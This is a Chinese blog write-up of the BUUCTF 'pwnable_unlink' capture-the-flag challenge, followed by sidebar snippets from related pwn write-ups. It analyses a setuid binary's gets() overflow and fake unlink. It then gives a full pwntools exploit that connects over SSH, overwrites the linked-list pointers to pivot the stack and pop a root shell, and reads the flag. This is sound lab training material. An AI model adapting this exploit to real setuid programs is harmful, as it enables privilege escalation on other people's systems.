[BUUCTF pwn] pwnable_unlink

最新推荐文章于 2022-04-23 22:17:48 发布
最新推荐文章于 2022-04-23 22:17:48 发布
阅读量692 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122278291
版权
本文详细介绍了如何通过SSH连接到远程主机,利用程序中getsf函数的栈溢出漏洞,结合堆操作技巧,构建ROP链以获取shell。文章通过分析程序代码,展示了如何泄露栈和堆地址,以及如何构造payload来控制程序执行流程,最终实现权限提升。虽然未发现预想的后门,但通过理解和利用现有条件,成功地展示了安全漏洞的利用方法。
摘要由CSDN通过智能技术生成

这种题见得少,看漏了两点,不过又学了东西。

题目只给了ssh地址用户和端口号,登上去看有源码和程序,于是下下来。二进制不让cat,但是里边居然安了python,一句话生成base64,再取回来。

unlink@out:~$ ls -l
total 16
-rw-r----- 1 root root   43 Jan  2 07:31 flag.txt
-rwsr-sr-x 1 root root 7448 Feb 14  2020 unlink
-rw-r--r-- 1 root root  772 Feb 14  2020 unlink.c
unlink@out:~$

程序就是一个手工unlink操作,gets有溢出

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *v4; // [esp+0h] [ebp-14h] BYREF
  _DWORD *v5; // [esp+4h] [ebp-10h]
  _DWORD *v6; // [esp+8h] [ebp-Ch]
  int *v7; // [esp+Ch] [ebp-8h]

  v7 = &argc;
  malloc(0x400u);
  v4 = (char *)malloc(0x10u);
  v6 = malloc(0x10u);
  v5 = malloc(0x10u);
  *(_DWORD *)v4 = v6;
  v6[1] = v4;
  *v6 = v5;
  v5[1] = v6;
  printf("here is stack address leak: %p\n", &v4);
  printf("here is heap address leak: %p\n", v4);
  puts("now that you have leaks, get shell!");
  gets(v4 + 8);
  unlink(v6);
  return 0;
}
_DWORD *__cdecl unlink(int *a1)
{
  _DWORD *result; // eax
  int v2; // [esp+8h] [ebp-8h]
  _DWORD *v3; // [esp+Ch] [ebp-4h]

  v3 = (_DWORD *)a1[1];
  v2 = *a1;
  *(_DWORD *)(v2 + 4) = v3;
  result = v3;
  *v3 = v2;
  return result;
}

这里建了3个块,由第2块为P

FD = P->fd; BK = P->bk;

FD->bk=BK;BK->fd = FD;

有点乱但仔细想也不乱:

将P->fd写为heap+0x24就是移栈以后ROP要执行的位置,P->bk=stack+0xc就是pop ecx放的地方,在ret前会pop ecx;mov esp,[ecx-4]。然后后边有个后门提权并得到shell

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    shell = ssh(host='node4.buuoj.cn', port=26711, user='unlink', password='guest')
    p = shell.process('./unlink')

elf = ELF('./pwn')
context(arch='i386', log_level='debug')

p.recvuntil(b'here is stack address leak: ')
stack = int(p.recvline(), 16) 
p.recvuntil(b'here is heap address leak: ')
heap = int(p.recvline(), 16)
print('stack:', hex(stack), 'heap:', hex(heap))

payload = b'#'*0x10 + flat(heap+0x24, stack +0x14-0x8, 0x8048566)
p.sendlineafter(b"now that you have leaks, get shell!\n", payload)

p.sendline(b'cat flag.txt')
p.interactive()

没看到后门,发现有setuid和system,白浪费时间了。单独调用的时候会比这个长,rop+8的位置写BK的时候会写到,要提前跳过。

石氏是时试
关注
专栏目录
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 253
BUUCTF 做题练习
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1081
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
pwnable之unlink
pwd_3的博客
09-29 683
问题分析程序自己写了一个实现unlink的程序,没有任何check,并且存在堆溢出经典的unlink attack,这里就不介绍了。//unlink bk_chunk = p->bk fd_chunk = p->fd bk_chunk->fd = fd_chunk fd_chunk->bk = bk_chunksolv.pyfrom pwn import * context.log_level =
unlink - pwnable
SkYe's Blog
09-30 487
预习知识 什么是unlinked unlinked 是堆溢出中的一种常见形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。(将双向链表上的chunk卸载下来与物理chunk合并) unlink漏洞条件 有3个以上的空闲chunk链表,其中最前面的chunk存在有堆溢出 unlink的触发 当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否空闲...
pwnable.kr】 unlink
weixin_30340745的博客
07-16 221
pwnable.kr 第一阶段的最后一题! 这道题目就是堆溢出的经典利用题目,不过是把堆块的分配与释放操作用C++重新写了一遍,可参考《C和C++安全编码一书》//不是广告 #include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ{ ...
pwnable.kr unlink
snowleopard_bin的博客
09-20 305
题目源码如下: #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; char buf[8]; }OBJ; void shell(){ sys...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 351
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTFpwnable_orw
qq_44768749的博客
08-27 1678
BUUCTFpwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 531
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
pwnable.kr-unlink
r00tnb的博客
07-26 435
前言 这是一道简化了的linux下malloc堆溢出漏洞利用。需要理解linux下关于glibc的堆管理的相关内容,参考 分析 分析源码unlink.c typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; char buf[8]; }OBJ; void shell(){ syst...
pwnable.kr】unlink - unlink4字节写,劫持ecx到堆中获取main_retaddr
think_ycx的专栏
11-23 319
题目信息 直接看源码: 这题思路很清晰,程序模拟了最简单的unlink过程,unlink的本质就是把中间的chunk从前后解链,同时修改前面chunk的fd和后面chunk的bk。如果可以溢出了会被unlink的chunk,32bit下在FD-&gt;bk=BK时,拥有一次4bit写的机会,同时需要保证BK-&gt;fd可写(BK-&gt;fd=FD同理)。 拥有任意地址写的机会...
pwnable.kr第二遍---unlink asm memcpy
leeham的博客
03-16 423
pwnable.kr需要学会的内容:&gt;&gt;&gt;&gt;&gt;unlink如何查看堆栈的内存分布?查看源代码的汇编:gdb disassemble funcmov和lea的关系mov的第二个操作是只能是常量,不能是表达式lea ecx,eax 语法错误lea ecx,[eax] 将eax的值给ecx,[]中可以是表达式mov ecx,eax 将eax的值给ecx,第二个操作数不能使表...
pwnable_applestore(unlink+局部变量生命周期外引用的漏洞)
seaaseesa的博客
06-12 369
pwnable_applestore(unlink+局部变量生命周期外引用的漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在checkout函数中,如果v1=7174,则把这个函数里的临时节点链接到了链表当中,这就存在了局部变量外部引用的漏洞,通过其他函数,我们可以控制v2节点的内容,进而可以泄露信息等。 控制其name指针指向got表,然后调用cart函数即可泄露地址 通过伪造其next和prev指针,在delete里,没有free操作,只是一个双向链表的解链操作,
[XCTF-Reverse] 25-30
weixin_52640415的博客
03-18 552
25,tinyctf-2014_elrond32 main里两个函数一个负责生成“密钥”,一个负责整理输出 int __cdecl main(int a1, char **a2) { if ( a1 > 1 && sub_8048414(a2[1], 0) ) { puts("Access granted"); sub_8048538((int)a2[1]); } else { puts("Access denied"); }
BUUCTF reverse wp 6 - 10
fa1c4的blog
05-16 322
helloword 安卓逆向, 工具下载 https://github.com/Juude/droidReverse 打开就有flag xor 当前位或异或前一位得到加密后的字符, 一共33位, 逐位异或, global数据是硬编码的, 所以简单解密即可. 查看16进制格式, 复制到脚本里, 正则处理数据成hex格式. 调整一下 rev脚本 enc = [0x66, 0x0A, 0x6B, 0x0C, 0x77, 0x26, 0x4F, 0x2E, 0x40, 0x11, 0x78, 0x0D, 0x
全面剖析Pwnable.kr unlink
Bill
08-10 2120
   最近一直在学习堆方面的知识,unlink是CTF中考察堆方面知识的重点.于是就拿一道简单的例题来剖析一下.堆方面的PWN对内存的分配和回收机制要求比较高,也是CTF中压轴题. 目录: 知识简介 漏洞分析 漏洞利用 Write Up及相关链接 知识简介: 为了节约内存,被使用之后的chunk和未使用的chunk的内存布局不相同,但是都用了相同的大小,于是free...
堆溢出 pawnable.kr Unlink
nibiru_holmes的博客
03-08 1764
题目地址:http://pwnable.kr/play.php 按题目提示连接  ssh unlink@pwnable.kr -p2222 (pw: guest) ls    发现和之前的题目一样: 三个文件分别是 flag,unlink,unlink.c 先查看unlink.c  源码如下: #include #include #include typedef struct tag
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值